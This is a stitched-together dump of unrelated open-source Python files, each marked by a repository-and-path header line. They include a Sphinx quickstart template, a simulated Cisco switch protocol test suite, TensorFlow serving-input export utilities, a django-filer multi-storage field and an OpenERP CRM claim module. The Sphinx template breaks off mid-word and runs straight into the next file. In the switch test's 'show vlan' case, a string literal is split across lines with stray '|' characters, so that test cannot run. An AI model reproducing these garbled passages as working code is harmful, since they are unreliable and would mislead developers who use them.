# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('%(master)s', '%(project_fn)s.tex', '%(project)s Documentation',
'%(author)s', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
'''
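# A hedged illustration, not part of the original module: QUICKSTART_CONF is a
# plain %-format template, so rendering a conf.py only needs one dict with the
# collected answers. All values below are invented.
def _example_render_conf():
    answers = dict(project='demo', project_fn='demo', author='Jane Doe',
                   version='0.1', release='0.1.0', now=time.asctime(),
                   year=time.strftime('%Y'), master='index', suffix='.rst',
                   dot='_', extensions='')
    return QUICKSTART_CONF % answers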
MASTER_FILE = '''\
.. %(project)s documentation master file, created by sphinx-quickstart on %(now)s.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to %(project)s's documentation!
===========%(underline)s=================
Contents:
.. toctree::
:maxdepth: 2
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
'''
MAKEFILE = '''\
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d %(rbuilddir)s/doctrees $(PAPEROPT_$(PAPER)) \
$(SPHINXOPTS) %(rsrcdir)s
.PHONY: help clean html web pickle htmlhelp latex changes linkcheck
help:
\t@echo "Please use \\`make <target>' where <target> is one of"
\t@echo " html to make standalone HTML files"
\t@echo " pickle to make pickle files (usable by e.g. sphinx-web)"
\t@echo " htmlhelp to make HTML files and a HTML help project"
\t@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
\t@echo " changes to make an overview over all changed/added/deprecated items"
\t@echo " linkcheck to check all external links for integrity"
clean:
\t-rm -rf %(rbuilddir)s/*
html:
\tmkdir -p %(rbuilddir)s/html %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) %(rbuilddir)s/html
\t@echo
\t@echo "Build finished. The HTML pages are in %(rbuilddir)s/html."
pickle:
\tmkdir -p %(rbuilddir)s/pickle %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) %(rbuilddir)s/pickle
\t@echo
\t@echo "Build finished; now you can process the pickle files or run"
\t@echo " sphinx-web %(rbuilddir)s/pickle"
\t@echo "to start the sphinx-web server."
web: pickle
htmlhelp:
\tmkdir -p %(rbuilddir)s/htmlhelp %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) %(rbuilddir)s/htmlhelp
\t@echo
\t@echo "Buil
internap/fake-switches | tests/cisco/test_cisco_switch_protocol.py | Python | apache-2.0 | 58,284 | 0.002316
# Copyright 2015-2016 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from tests.cisco import enable, create_interface_vlan, configuring, configuring_interface_vlan, \
assert_interface_configuration, remove_vlan, create_vlan, set_interface_on_vlan, configuring_interface, \
revert_switchport_mode_access, create_port_channel_interface, configuring_port_channel
from tests.util.protocol_util import SshTester, TelnetTester, with_protocol, ProtocolTest
class TestCiscoSwitchProtocol(ProtocolTest):
__test__ = False
test_switch = "cisco"
@with_protocol
def test_enable_command_requires_a_password(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible(t.conf["extra"]["password"])
t.read("my_switch#")
@with_protocol
def test_wrong_password(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible("hello_world")
t.readln("% Access denied")
t.readln("")
t.read("my_switch>")
@with_protocol
def test_no_password_works_for_legacy_reasons(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible("")
t.read("my_switch#")
@with_protocol
def test_exiting_loses_the_connection(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible(t.conf["extra"]["password"])
t.read("my_switch#")
t.write("exit")
t.read_eof()
@with_protocol
def test_no_such_command_return_to_prompt(self, t):
enable(t)
t.write("shizzle")
t.readln("No such command : shizzle")
t.read("my_switch#")
@with_protocol
@mock.patch("fake_switches.adapters.tftp_reader.read_tftp")
def test_command_copy_failing(self, t, read_tftp):
read_tftp.side_effect = Exception("Stuff")
enable(t)
t.write("copy tftp://1.2.3.4/my-file system:/running-config")
t.read("Destination filename [running-config]? ")
t.write("gneh")
t.readln("Accessing tftp://1.2.3.4/my-file...")
t.readln("Error opening tftp://1.2.3.4/my-file (Timed out)")
t.read("my_switch#")
read_tftp.assert_called_with("1.2.3.4", "my-file")
@with_protocol
@mock.patch("fake_switches.adapters.tftp_reader.read_tftp")
def test_command_copy_success(self, t, read_tftp):
enable(t)
t.write("copy tftp://1.2.3.4/my-file system:/running-config")
t.read("Destination filename [running-config]? ")
t.write_raw("\r")
t.wait_for("\r\n")
t.readln("Accessing tftp://1.2.3.4/my-file...")
t.readln("Done (or some official message...)")
t.read("my_switch#")
read_tftp.assert_called_with("1.2.3.4", "my-file")
@with_protocol
def test_command_show_run_int_vlan_empty(self, t):
enable(t)
t.write("terminal length 0")
t.read("my_switch#")
t.write("show run vlan 120")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("end")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_command_add_vlan(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("vlan 123")
t.read("my_switch(config-vlan)#")
t.write("name shizzle")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
t.write("show run vlan 123")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("!")
t.readln("vlan 123")
t.readln(" name shizzle")
t.readln("end")
t.readln("")
t.read("my_switch#")
remove_vlan(t, "123")
t.write("show running-config vlan 123")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("end")
t.read("")
@with_protocol
def test_command_assign_access_vlan_to_port(self, t):
enable(t)
create_vlan(t, "123")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
" switchport access vlan 123",
" switchport mode access",
"end"])
configuring_interface(t, "FastEthernet0/1", do="no switchport access vlan")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
" switchport mode access",
"end"])
configuring_interface(t, "FastEthernet0/1", do="no switchport mode access")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
"end"])
remove_vlan(t, "123")
@with_protocol
def test_show_vlan_brief(self, t):
enable(t)
create_vlan(t, "123")
create_vlan(t, "3333", "some-name")
create_vlan(t, "2222", "your-name-is-way-too-long-for-this-pretty-printed-interface-man")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
t.write("show vlan brief")
t.readln("")
t.readln("VLAN Name Status Ports")
t.readln("---- -------------------------------- --------- -------------------------------")
t.readln("1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5")
t.readln(" Fa0/6, Fa0/7, Fa0/8, Fa0/9")
t.readln(" Fa0/10, Fa0/11, Fa0/12")
t.readln("123 VLAN123 active Fa0/1")
t.readln("2222 your-name-is-way-too-long-for-th active")
t.readln("3333 some-name active")
t.read("my_switch#")
revert_switchport_mode_access(t, "FastEthernet0/1")
remove_vlan(t, "123")
remove_vlan(t, "2222")
remove_vlan(t, "3333")
@with_protocol
def test_show_vlan(self, t):
enable(t)
create_vlan(t, "123")
create_vlan(t, "3333", "some-name")
create_vlan(t, "2222", "your-name-is-way-too-long-for-this-pretty-printed-interface-man")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
t.write("show vlan")
t.readln("")
t.readln("VLAN Name Status Ports")
t.readln("---- ----------------
|
---------------- -----
|
---- -------------------------------")
t.readln("1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5")
t.readln(" Fa0/6, Fa0/7, Fa0/8, Fa0/9")
t.readln(" Fa0/10, Fa0/11, Fa0/12")
t.readln("123 VLAN123 active Fa0/1")
t.readln("2222 your-name-is-way-too-long-for-th active")
t.readln("3333 some-name active")
t.readln("")
t.readln("VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2")
t.readln("---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------")
t.readln("1 enet 100001 1500 - - - - - 0 0")
t.readln("123 enet 100123 1500 - - - - - 0 0")
cloudera/hue | desktop/core/ext-py/pytest-4.6.11/doc/en/example/py2py3/conftest.py | Python | apache-2.0 | 348 | 0
# -*- coding: utf-8 -*-
import sys
import pytest
py3 = sys.version_info[0] >= 3
class DummyCollector(pytest.collect.File):
def collect(self):
return []
def pytest_pycollect_makemodule(path, parent):
bn = path.basename
if "py3" in bn and not py3 or ("py2" in bn and py3):
return DummyCollector(path, parent=parent)
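# Example (illustrative): under Python 3 a module named "test_foo_py2.py" is
# handed to DummyCollector and contributes no tests, while "test_foo_py3.py"
# is collected normally; under Python 2 the roles are reversed.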
dyoung418/tensorflow | tensorflow/python/estimator/export/export.py | Python | apache-2.0 | 14,219 | 0.005767
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configuration and utilities for receiving inputs at serving time."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import time
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.util import compat
_SINGLE_FEATURE_DEFAULT_NAME = 'feature'
_SINGLE_RECEIVER_DEFAULT_NAME = 'input'
class ServingInputReceiver(collections.namedtuple(
'ServingInputReceiver',
['features', 'receiver_tensors', 'receiver_tensors_alternatives'])):
"""A return type for a serving_input_receiver_fn.
The expected return values are:
features: A `Tensor`, `SparseTensor`, or dict of string to `Tensor` or
`SparseTensor`, specifying the features to be passed to the model.
receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
input nodes where this receiver expects to be fed by default. Typically,
this is a single placeholder expecting serialized `tf.Example` protos.
receiver_tensors_alternatives: a dict of string to additional
groups of receiver tensors, each of which may be a `Tensor` or a dict of
string to `Tensor`. These named receiver tensor alternatives generate
additional serving signatures, which may be used to feed inputs at
different points within the input receiver subgraph. A typical usage is
to allow feeding raw feature `Tensor`s *downstream* of the
tf.parse_example() op. Defaults to None.
"""
def __new__(cls, features, receiver_tensors,
receiver_tensors_alternatives=None):
if features is None:
raise ValueError('features must be defined.')
if not isinstance(features, dict):
features = {_SINGLE_FEATURE_DEFAULT_NAME: features}
for name, tensor in features.items():
if not isinstance(name, six.string_types):
raise ValueError('feature keys must be strings: {}.'.format(name))
if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor)):
raise ValueError(
'feature {} must be a Tensor or SparseTensor.'.format(name))
if receiver_tensors is None:
raise ValueError('receiver_tensors must be defined.')
if not isinstance(receiver_tensors, dict):
receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
for name, tensor in receiver_tensors.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not isinstance(tensor, ops.Tensor):
raise ValueError(
'receiver_tensor {} must be a Tensor.'.format(name))
if receiver_tensors_alternatives is not None:
if not isinstance(receiver_tensors_alternatives, dict):
raise ValueError(
'receiver_tensors_alternatives must be a dict: {}.'.format(
receiver_tensors_alternatives))
for alternative_name, receiver_tensors_alt in (
six.iteritems(receiver_tensors_alternatives)):
if not isinstance(receiver_tensors_alt, dict):
receiver_tensors_alt = {_SINGLE_RECEIVER_DEFAULT_NAME:
receiver_tensors_alt}
# Updating dict during iteration is OK in this case.
receiver_tensors_alternatives[alternative_name] = (
receiver_tensors_alt)
for name, tensor in receiver_tensors_alt.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor)):
raise ValueError(
'receiver_tensor {} must be a Tensor or SparseTensor.'.format(
name))
return super(ServingInputReceiver, cls).__new__(
cls,
features=features,
receiver_tensors=receiver_tensors,
receiver_tensors_alternatives=receiver_tensors_alternatives)
def build_parsing_serving_input_receiver_fn(feature_spec,
default_batch_size=None):
"""Build a serving_input_receiver_fn expecting fed tf.Examples.
Creates a serving_input_receiver_fn that expects a serialized tf.Example fed
into a string placeholder. The function parses the tf.Example according to
the provided feature_spec, and returns all parsed Tensors as features.
Args:
feature_spec: a dict of string to `VarLenFeature`/`FixedLenFeature`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn suitable for use in serving.
"""
def serving_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = array_ops.placeholder(dtype=dtypes.string,
shape=[default_batch_size],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = parsing_ops.parse_example(serialized_tf_example, feature_spec)
return ServingInputReceiver(features, receiver_tensors)
return serving_input_receiver_fn
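# A hedged usage sketch, not part of the original module: building a parsing
# receiver fn from a made-up feature_spec and materializing the receiver. The
# feature names and shapes are invented for illustration.
def _example_parsing_receiver():
    feature_spec = {
        'age': parsing_ops.FixedLenFeature([1], dtype=dtypes.int64),
        'query': parsing_ops.VarLenFeature(dtype=dtypes.string),
    }
    receiver_fn = build_parsing_serving_input_receiver_fn(feature_spec)
    receiver = receiver_fn()  # adds the 'input_example_tensor' placeholder
    return receiver.features, receiver.receiver_tensors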
def build_raw_serving_input_receiver_fn(features, default_batch_size=None):
"""Build a serving_input_receiver_fn expecting feature Tensors.
Creates an serving_input_receiver_fn that expects all features to be fed
directly.
Args:
features: a dict of string to `Tensor`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn.
"""
def serving_input_receiver_fn():
"""A serving_input_receiver_fn that expects features to be fed directly."""
receiver_tensors = {}
for name, t in features.items():
shape_list = t.get_shape().as_list()
shape_list[0] = default_batch_size
shape = tensor_shape.TensorShape(shape_list)
# Reuse the feature tensor's op name (t.op.name) for the placeholder,
# excluding the index from the tensor's name (t.name):
# t.name = "%s:%d" % (t.op.name, t._value_index)
receiver_tensors[name] = array_ops.placeholder(
dtype=t.dtype, shape=shape, name=t.op.name)
# TODO(b/34885899): remove the unnecessary copy
# The features provided are simply the placeholders, but we defensively copy
# the dict because it may be mutated.
return ServingInputReceiver(receiver_tensors, receiver_tensors.copy())
return serving_input_receiver_fn
### Below utilities are specific to SavedModel exports.
def build_all_signature_defs(receiver_tensors,
export_outputs,
receiver_tensors_alternatives=None):
"""Build `SignatureDef`s for all export outputs.
thorwhalen/ut | daf/struct.py | Python | mit | 2,689 | 0.003719
__author__ = 'thor'
import ut as ms
import pandas as pd
import ut.pcoll.order_conserving
from functools import reduce
class SquareMatrix(object):
def __init__(self, df, index_vars=None, sort=False):
if isinstance(df, SquareMatrix):
self = df.copy()
elif isinstance(df, pd.DataFrame):
self.df = df
self.index_vars = index_vars
self.value_vars = ms.pcoll.order_conserving.setdiff(list(self.df.columns), self.index_vars)
self.df = self.df[self.index_vars + self.value_vars]
else:
raise NotImplementedError("This case hasn't been implemented yet")
if sort:
self.df.sort(columns=self.index_vars, inplace=True)
def copy(self):
return SquareMatrix(df=self.df.copy(), index_vars=self.index_vars)
def transpose(self):
return SquareMatrix(df=self.df, index_vars=[self.index_vars[1], self.index_vars[0]])
def reflexive_mapreduce(self, map_fun, reduce_fun=None, broadcast_functions=True):
df = self.df.merge(self.df, how='inner', left_on=self.index_vars[1],
right_on=self.index_vars[0], suffixes=('', '_y'))
df[self.index_vars[1]] = df[self.index_vars[1] + '_y']
df.drop(labels=[self.index_vars[0] + '_y', self.index_vars[1] + '_y'], axis=1, inplace=True)
if not isinstance(map_fun, dict) and broadcast_functions:
map_fun = dict(list(zip(self.value_vars, [map_fun] * len(self.value_vars))))
for k, v in map_fun.items():
df[k] = v(df[k], df[k + '_y'])
df.drop(labels=[x + '_y' for x in self.value_vars], axis=1, inplace=True)
if not reduce_fun:
reduce_fun = dict()
for k, v in map_fun.items():
reduce_fun[k] = lambda x: reduce(v, x)
elif not isinstance(reduce_fun, dict) and broadcast_functions:
reduce_fun = dict(list(zip(self.value_vars, [reduce_fun] * len(self.value_vars))))
df = df.groupby(self.index_vars).agg(reduce_fun).reset_index(drop=False)
return SquareMatrix(df=df, index_vars=self.index_vars)
def reverse_indices(self):
return [self.index_vars[1], self.index_vars[0]]
def sort(self, **kwargs):
kwargs = dict({'columns': self.index_vars}, **kwargs)
sm = self.copy()
sm.df = sm.df.sort(**kwargs)
return sm
def __str__(self):
return self.df.__str__()
def __repr__(self):
return self.df.set_index(self.index_vars).__str__()
def head(self, num_of_rows=5):
return self.df.head(num_of_rows)
def tail(self, num_of_rows=5):
return self.df.tail(num_of_rows)
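# A hedged usage sketch, not from the original module: a tiny (from, to) square
# matrix; the column names and values are invented.
def _example_square_matrix():
    df = pd.DataFrame({'from': ['a', 'a', 'b', 'b'],
                       'to': ['a', 'b', 'a', 'b'],
                       'dist': [0, 1, 1, 0]})
    sm = SquareMatrix(df, index_vars=['from', 'to'])
    # transpose() swaps the roles of the two index columns;
    # reflexive_mapreduce() joins the matrix with itself on the shared index
    # and then reduces the paired value columns per (from, to) combination.
    return sm.transpose()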
WebArchivCZ/Seeder | Seeder/harvests/scheduler.py | Python | mit | 1,219 | 0.00082
from datetime import date, timedelta
INITIAL_OFFSET = timedelta(days=5)
class IntervalException(Exception):
"""
Exception to be raises when interval is behaving
weirdly - as not an interval
"""
def get_dates_for_timedelta(interval_delta, start=None, stop=None,
skip_weekend=False):
"""
For given interval_delta it will return list of dates starting from
``starting date``
:param interval_delta: interval_delta instance
:type interval_delta: datetime.timedelta
:param start: starting point of the interval
:type start: date
:param stop: when to stop
:param skip_weekend: don't place dates at weekends
:return: [datetime objects]
"""
if start is None:
start = date.today()
if stop is None:
stop = start + timedelta(days=365)
dates = [start]
while dates[-1] + interval_delta <= stop:
increased_date = dates[-1] + interval_delta
if skip_weekend and increased_date.isoweekday() > 5:
increased_date += timedelta(days=2)
if increased_date == dates[-1]:
raise IntervalException(interval_delta)
dates.append(increased_date)
return dates
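# Illustrative only, not in the original module: roughly monthly harvest dates
# for one quarter, pushed off weekends; the concrete dates are invented.
if __name__ == '__main__':
    print(get_dates_for_timedelta(timedelta(days=30),
                                  start=date(2018, 1, 1),
                                  stop=date(2018, 4, 1),
                                  skip_weekend=True))
    # expected: [2018-01-01, 2018-01-31, 2018-03-02, 2018-04-03]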
jakob-o/django-filer | filer/fields/multistorage_file.py | Python | bsd-3-clause | 5,617 | 0.001068
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import base64
import hashlib
import warnings
from io import BytesIO
from django.core.files.base import ContentFile
from django.utils import six
from easy_thumbnails import fields as easy_thumbnails_fields
from easy_thumbnails import files as easy_thumbnails_files
from .. import settings as filer_settings
from ..utils.filer_easy_thumbnails import ThumbnailerNameMixin
STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_STORAGE,
}
THUMBNAIL_STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_STORAGE,
}
THUMBNAIL_OPTIONS = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_OPTIONS,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_OPTIONS,
}
def generate_filename_multistorage(instance, filename):
if instance.is_public:
upload_to = filer_settings.FILER_PUBLICMEDIA_UPLOAD_TO
else:
upload_to = filer_settings.FILER_PRIVATEMEDIA_UPLOAD_TO
if callable(upload_to):
return upload_to(instance, filename)
else:
return upload_to
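# Example (illustrative): Django calls upload_to callables as fn(instance,
# filename), so a public instance resolves through FILER_PUBLICMEDIA_UPLOAD_TO
# and a private one through FILER_PRIVATEMEDIA_UPLOAD_TO; the same filename can
# therefore land under two different prefixes depending on instance.is_public.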
class MultiStorageFieldFile(ThumbnailerNameMixin,
easy_thumbnails_files.ThumbnailerFieldFile):
def __init__(self, instance, field, name):
"""
This is a little weird, but I couldn't find a better solution.
Thumbnailer.__init__ is called first for proper object initialization.
Then we override some attributes defined at runtime with properties.
We cannot simply call super().__init__ because filer Field objects
don't have a storage attribute.
"""
easy_thumbnails_files.Thumbnailer.__init__(self, None, name)
self.instance = instance
self.field = field
self._committed = True
self.storages = self.field.storages
self.thumbnail_storages = self.field.thumbnail_storages
self.thumbnail_options = self.field.thumbnail_options
self.storage = self._storage
self.source_storage = self._source_storage
self.thumbnail_storage = self._thumbnail_storage
self.thumbnail_basedir = self._thumbnail_base_dir
@property
def _storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _source_storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _thumbnail_storage(self):
if self.instance.is_public:
return self.thumbnail_storages['public']
else:
return self.thumbnail_storages['private']
@property
def _thumbnail_base_dir(self):
if self.instance.is_public:
return self.thumbnail_options['public'].get('base_dir', '')
else:
return self.thumbnail_options['private'].get('base_dir', '')
def save(self, name, content, save=True):
content.seek(0) # Ensure we upload the whole file
super(MultiStorageFieldFile, self).save(name, content, save)
class MultiStorageFileField(easy_thumbnails_fields.ThumbnailerField):
attr_class = MultiStorageFieldFile
def __init__(self, verbose_name=None, name=None,
storages=None, thumbnail_storages=None, thumbnail_options=None, **kwargs):
if 'upload_to' in kwargs: # pragma: no cover
upload_to = kwargs.pop("upload_to")
if upload_to != generate_filename_multistorage:
warnings.warn("MultiStorageFileField can handle only File objects;"
"%s passed" % upload_to, SyntaxWarning)
self.storages = storages or STORAGES
self.thumbnail_storages = thumbnail_storages or THUMBNAIL_STORAGES
self.thumbnail_options = thumbnail_options or THUMBNAIL_OPTIONS
super(easy_thumbnails_fields.ThumbnailerField, self).__init__(
verbose_name=verbose_name, name=name,
upload_to=generate_filename_multistorage,
storage=None, **kwargs)
def value_to_string(self, obj):
value = super(MultiStorageFileField, self).value_to_string(obj)
if not filer_settings.FILER_DUMP_PAYLOAD:
return value
try:
payload_file = BytesIO(self.storage.open(value).read())
sha = hashlib.sha1()
sha.update(payload_file.read())
if sha.hexdigest() != obj.sha1:
warnings.warn('The checksum for "%s" diverges. Check for file consistency!' % obj.original_filename)
payload_file.seek(0)
encoded_string = base64.b64encode(payload_file.read()).decode('utf-8')
return value, encoded_string
except IOError:
warnings.warn('The payload for "%s" is missing. No such file on disk: %s!' % (obj.original_filename, self.storage.location))
return value
def to_python(self, value):
if isinstance(value, list) and len(value) == 2 and isinstance(value[0], six.text_type):
filename, payload = value
try:
payload = base64.b64decode(payload)
except TypeError:
pass
else:
if self.storage.exists(filename):
self.storage.delete(filename)
self.storage.save(filename, ContentFile(payload))
return filename
return value
pocketone/django-shoppy | shoppy/util/randomuserid.py | Python | bsd-3-clause | 499 | 0.012024
import string
from random import choice
from django.contrib.auth.models import User
def get_random_id():
valid_id = False
test_name = 'EMPTY'
while valid_id is False:
s1 = ''.join([choice(string.ascii_uppercase) for i in range(2)])
s2 = ''.join([choice(string.digits) for i in range(8)])
test_name = u'%s%s' % (s1,s2)
try:
User.objects.get(username=test_name)
except:
valid_id = True
return test_name
blancoamor/crm_rma_blancoamor | crm_rma_blancoamor.py | Python | agpl-3.0 | 14,539 | 0.008941
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import models, fields, api
from openerp.addons.crm import crm
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
from openerp.tools import html2plaintext
from datetime import datetime, timedelta
import logging
_logger = logging.getLogger(__name__)
AVAILABLE_ACTIONS = [
('correction','Corrective Action'),
('prevention','Preventive Action'),
('replace','Replace Action'), # New option
('discard','Discard Action'), # New option
]
class crm_claim(osv.osv):
_name = "crm.claim"
_inherit = "crm.claim"
_columns = {
'origin': fields.char('Origin',size=30,readonly=True),
'products_id': fields.many2many('product.product', 'crm_claim_products', 'crm_claim_id', 'product_id', 'Productos', track_visibility='onchange'),
'has_check_solution': fields.boolean('has check soluction',readonly=True),
'type_action': fields.selection(AVAILABLE_ACTIONS, 'Action Type',readonly=True), # Override required and selections
'type_id': fields.many2one('crm.claim.type', 'Type'),
#'product_id' : fields.Many2one('product.product'),
#'ref': fields.reference('Reference', selection=openerp.addons.base.res.res_request.referencable_models),
}
_defaults = {
'origin': lambda self, cr, uid, context: 'self',
}
def create(self, cr, uid, vals, context=None):
if not 'number_id' in vals or vals['number_id'] == '/':
if not 'origin' in vals :
vals['origin'] = 'self'
vals['number_id'] = vals['origin'] + str(self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'))
#vals['number_id'] = vals['origin'] + str(self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'))
return super(crm_claim, self).create(cr, uid, vals, context)
def write(self, cr, uid, ids, vals, context=None):
if 'stage_id' in vals:
clm_stg = self.pool.get('crm.claim.stage')
stage=clm_stg.read(cr, uid, vals['stage_id'], ['user_id','day_to_action_next','action_next','days_to_date_deadline'])
if 'action_next' in stage and stage['action_next']:
vals['action_next']=stage['action_next']
vals['date_action_next']=datetime.today()+timedelta(days=int(stage['day_to_action_next']))
vals['user_id']=stage['user_id'][0]
if 'days_to_date_deadline' in stage and stage['days_to_date_deadline']:
vals['date_deadline']=datetime.today()+timedelta(days=int(stage['days_to_date_deadline']))
return super(crm_claim, self).write(cr, uid, ids, vals, context=context)
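# Example (illustrative): writing a claim into a stage configured with
# day_to_action_next=7 sets date_action_next to today + 7 days, copies the
# stage's action_next text, reassigns user_id to the stage's responsible and,
# if days_to_date_deadline is set, recomputes date_deadline the same way.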
def copy(self, cr, uid, _id, default={}, context=None):
default.update({
'number_id': self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'),
})
return super(crm_claim, self).copy(cr, uid, _id, default, context)
crm_claim()
class crm_claim_stage(osv.osv):
_name = "crm.claim.stage"
_inherit = "crm.claim.stage"
_columns = {
'user_id': fields.many2one('res.users', 'Responsible', track_visibility='always'),
'day_to_action_next': fields.integer('Days to next action'),
'action_next': fields.char('Next Action'),
'days_to_date_deadline': fields.char('Date to deadline'),
}
_defaults = {
'day_next_action': lambda self, cr, uid, context: '7',
}
crm_claim_stage()
class crm_claim_type(osv.osv):
""" Type of Claim """
_name = "crm.claim.type"
_description = "Type of Claim"
_columns = {
'name': fields.char('Name', required=True, translate=True),
'parent_id': fields.many2one('crm.claim.type', 'Type of claim', required=False, ondelete='cascade',
help="Claim type."),
}
"""def _find_object_id(self, cr, uid, context=None):
context = context or {}
object_id = context.get('object_id', False)
ids = self.pool.get('ir.model').search(cr, uid, ['|', ('id', '=', object_id), ('model', '=', context.get('object_name', False))])
return ids and ids[0] or False
_defaults = {
'object_id': _find_object_id
}"""
class claim_from_invoice(osv.osv_memory):
_name = 'claim.from.invoice'
_description = 'claim from invoice'
_columns = {
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
}
def claim_from_invoice(self, cr, uid, ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
class view_account_invoice_claims(osv.osv):
_name = "view.account.invoice.claims"
_description = "Claim by account invoice"
_auto = False
_columns = {
'id': fields.integer('ID', readonly=True),
'invoice_id': fields.many2one('account.invoice', 'Invoice'),
'partner_id': fields.many2one('res.partner', 'Partner'),
'number': fields.char('number'),
'name': fields.char('name'),
'claim_id': fields.many2one('crm.claim', 'Claim'),
'crm_claim_name': fields.char('Subject'),
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
#'invoice_line_text_line':fields.function('get_text_lines', store=False,relation='view.account.invoice.claims' ,
# method=True, string='lines',type='char')
'invoice_line_text': fields.char(compute='_get_text_lines' ,store=False, string="Productos"),
}
